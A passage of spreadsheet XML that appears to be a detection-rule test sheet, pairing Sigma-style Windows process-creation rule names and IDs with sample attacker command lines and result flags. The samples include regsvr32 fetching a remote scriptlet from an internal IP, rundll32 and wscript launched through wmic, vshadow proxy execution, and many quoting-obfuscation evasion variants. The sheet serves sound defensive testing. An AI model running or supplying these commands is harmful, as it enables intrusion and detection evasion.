      <c r="F377" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G377" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H377" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I377" s="36" t="n"/>
      <c r="J377" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K377" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="378" ht="15.75" customHeight="1" s="42">
      <c r="A378" s="43" t="n"/>
      <c r="B378" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C378" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D378" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E378" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F378" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G378" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H378" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I378" s="36" t="n"/>
      <c r="J378" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K378" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="379" ht="15.75" customHeight="1" s="42">
      <c r="A379" s="36" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B379" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bash_command_execution</t>
        </is>
      </c>
      <c r="C379" s="36" t="inlineStr">
        <is>
          <t>Indirect Inline Command Execution Via Bash.EXE</t>
        </is>
      </c>
      <c r="D379" s="36" t="inlineStr">
        <is>
          <t>5edc2273-c26f-406c-83f3-f4d948e740dd</t>
        </is>
      </c>
      <c r="E379" s="36" t="inlineStr">
        <is>
          <t>echo whoami | C:\Windows\System32\bash.exe</t>
        </is>
      </c>
      <c r="F379" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G379" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H379" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I379" s="43" t="n"/>
      <c r="J379" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K379" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="380" ht="15.75" customHeight="1" s="42">
      <c r="A380" s="36" t="n"/>
      <c r="B380" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_office_exec_from_trusted_locations</t>
        </is>
      </c>
      <c r="C380" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Office Document Executed From Trusted Location</t>
        </is>
      </c>
      <c r="D380" s="36" t="inlineStr">
        <is>
          <t>f99abdf0-6283-4e71-bd2b-b5c048a94743</t>
        </is>
      </c>
      <c r="E380" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "start winword.exe C:\Users\Admin\AppData\Roaming\Microsoft\Templates\malicious.docm"</t>
        </is>
      </c>
      <c r="F380" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G380" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H380" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I380" s="43" t="n"/>
      <c r="J380" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K380" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="381" ht="15.75" customHeight="1" s="42">
      <c r="A381" s="36" t="n"/>
      <c r="B381" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C381" s="36" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D381" s="36" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E381" s="36" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Software\Policies\Microsoft\Office\16.0\Outlook\Security" /v EnableUnsafeClientMailRules /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F381" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G381" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H381" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I381" s="36" t="n"/>
      <c r="J381" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K381" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="382" ht="15.75" customHeight="1" s="42">
      <c r="A382" s="36" t="n"/>
      <c r="B382" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C382" s="36" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D382" s="36" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E382" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F382" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G382" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H382" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I382" s="43" t="n"/>
      <c r="J382" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K382" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="383" ht="15.75" customHeight="1" s="42">
      <c r="A383" s="43" t="n"/>
      <c r="B383" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_pingcastle</t>
        </is>
      </c>
      <c r="C383" s="36" t="inlineStr">
        <is>
          <t>Renamed PingCastle Binary Execution</t>
        </is>
      </c>
      <c r="D383" s="36" t="inlineStr">
        <is>
          <t>2433a154-bb3d-42e4-86c3-a26bdac91c45</t>
        </is>
      </c>
      <c r="E383" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "audit_tool.exe --s^canner a^clcheck"</t>
        </is>
      </c>
      <c r="F383" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G383" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H383" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I383" s="43" t="n"/>
      <c r="J383" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K383" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="384" ht="15.75" customHeight="1" s="42">
      <c r="A384" s="43" t="n"/>
      <c r="B384" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_splwow64_cli_anomaly</t>
        </is>
      </c>
      <c r="C384" s="36" t="inlineStr">
        <is>
          <t>Suspicious Splwow64 Without Params</t>
        </is>
      </c>
      <c r="D384" s="36" t="inlineStr">
        <is>
          <t>1f1a8509-2cbb-44f5-8751-8e1571518ce2</t>
        </is>
      </c>
      <c r="E384" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\splwow64.exe"</t>
        </is>
      </c>
      <c r="F384" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G384" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H384" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I384" s="43" t="n"/>
      <c r="J384" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K384" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="385" ht="15.75" customHeight="1" s="42">
      <c r="A385" s="43" t="n"/>
      <c r="B385" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_vshadow_exec</t>
        </is>
      </c>
      <c r="C385" s="36" t="inlineStr">
        <is>
          <t>Proxy Execution via Vshadow</t>
        </is>
      </c>
      <c r="D385" s="36" t="inlineStr">
        <is>
          <t>d7c75059-2901-4578-b209-8837fd31c6a8</t>
        </is>
      </c>
      <c r="E385" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c vshadow.exe -e^xec=C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F385" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G385" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H385" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I385" s="43" t="n"/>
      <c r="J385" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K385" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="386" ht="15.75" customHeight="1" s="42">
      <c r="A386" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B386" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C386" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D386" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E386" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F386" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G386" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H386" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I386" s="43" t="n"/>
      <c r="J386" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K386" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="387" ht="15.75" customHeight="1" s="42">
      <c r="A387" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B387" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C387" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D387" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E387" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F387" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G387" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H387" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I387" s="43" t="n"/>
      <c r="J387" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K387" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="388" ht="15.75" customHeight="1" s="42">
      <c r="A388" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B388" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C388" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D388" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E388" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F388" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G388" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H388" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I388" s="43" t="n"/>
      <c r="J388" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K388" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="389" ht="15.75" customHeight="1" s="42">
      <c r="A389" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B389" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C389" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D389" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E389" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //nolOgO C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F389" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G389" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H389" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I389" s="43" t="n"/>
      <c r="J389" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K389" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="390" ht="15.75" customHeight="1" s="42">
      <c r="A390" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B390" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C390" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D390" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E390" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe -"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F390" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G390" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H390" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I390" s="43" t="n"/>
      <c r="J390" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K390" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="391" ht="15.75" customHeight="1" s="42">
      <c r="A391" s="36" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B391" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C391" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D391" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E391" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //NoLOGO C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F391" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G391" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H391" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I391" s="43" t="n"/>
      <c r="J391" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K391" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="392" ht="15.75" customHeight="1" s="42">
      <c r="A392" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B392" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C392" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D392" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E392" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe -"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F392" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G392" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H392" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I392" s="43" t="n"/>
      <c r="J392" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K392" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="393" ht="15.75" customHeight="1" s="42">
      <c r="A393" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B393" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C393" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D393" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E393" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe -"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F393" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G393" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H393" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I393" s="43" t="n"/>
      <c r="J393" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K393" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="394" ht="15.75" customHeight="1" s="42">
      <c r="A394" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B394" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C394" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D394" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E394" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /"s" /n -"u""</t>
        </is>
      </c>
      <c r="F394" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G394" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H394" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I394" s="43" t="n"/>
      <c r="J394" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K394" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="395" ht="15.75" customHeight="1" s="42">
      <c r="A395" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B395" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C395" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D395" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E395" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /S /N /u"</t>
        </is>
      </c>
      <c r="F395" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G395" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H395" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I395" s="43" t="n"/>
      <c r="J395" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K395" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="396" ht="15.75" customHeight="1" s="42">
      <c r="A396" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B396" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C396" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D396" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E396" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /"s" /"n" /u"</t>
        </is>
      </c>
      <c r="F396" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G396" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H396" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I396" s="43" t="n"/>
      <c r="J396" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K396" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="397" ht="15.75" customHeight="1" s="42">
      <c r="A397" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B397" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C397" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D397" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E397" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /N /u"</t>
        </is>
      </c>
      <c r="F397" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G397" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H397" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I397" s="43" t="n"/>
      <c r="J397" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K397" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="398" ht="15.75" customHeight="1" s="42">
      <c r="A398" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B398" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C398" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D398" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E398" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /N /U"</t>
        </is>
      </c>
      <c r="F398" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G398" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H398" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I398" s="36" t="n"/>
      <c r="J398" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K398" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="399" ht="15.75" customHeight="1" s="42">
      <c r="A399" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B399" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C399" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D399" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E399" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer -"s" -"n" /U"</t>
        </is>
      </c>
      <c r="F399" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G399" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H399" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I399" s="36" t="n"/>
      <c r="J399" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K399" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="400" ht="15.75" customHeight="1" s="42">
      <c r="A400" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B400" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C400" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D400" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E400" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer -"s" /N /u"</t>
        </is>
      </c>
      <c r="F400" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G400" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H400" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I400" s="36" t="n"/>
      <c r="J400" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K400" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="401" ht="15.75" customHeight="1" s="42">
      <c r="A401" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B401" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C401" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D401" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E401" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n /"u""</t>
        </is>
      </c>
      <c r="F401" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G401" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H401" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I401" s="36" t="n"/>
      <c r="J401" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K401" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="402" ht="15.75" customHeight="1" s="42">
      <c r="A402" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B402" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C402" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D402" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E402" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n -"u""</t>
        </is>
      </c>
      <c r="F402" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G402" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H402" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I402" s="36" t="n"/>
      <c r="J402" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K402" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="403" ht="15.75" customHeight="1" s="42">
      <c r="A403" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B403" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C403" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D403" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E403" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /"n" /"u""</t>
        </is>
      </c>
      <c r="F403" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G403" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H403" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I403" s="36" t="n"/>
      <c r="J403" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K403" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="404" ht="15.75" customHeight="1" s="42">
      <c r="A404" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B404" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_manage_bde</t>
        </is>
      </c>
      <c r="C404" s="36" t="inlineStr">
        <is>
          <t>Potential Manage-bde.wsf Abuse To Proxy Execution</t>
        </is>
      </c>
      <c r="D404" s="36" t="inlineStr">
        <is>
          <t>c363385c-f75d-4753-a108-c1a8e28bdbda</t>
        </is>
      </c>
      <c r="E404" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd /d C:\Windows\System32\ &amp;&amp; cscript.exe //nologo manage-bde.wsf"</t>
        </is>
      </c>
      <c r="F404" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G404" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H404" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I404" s="43" t="n"/>
      <c r="J404" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K404" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="405" ht="15.75" customHeight="1" s="42">
      <c r="A405" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B405" s="36" t="inlineStr">
        <is>
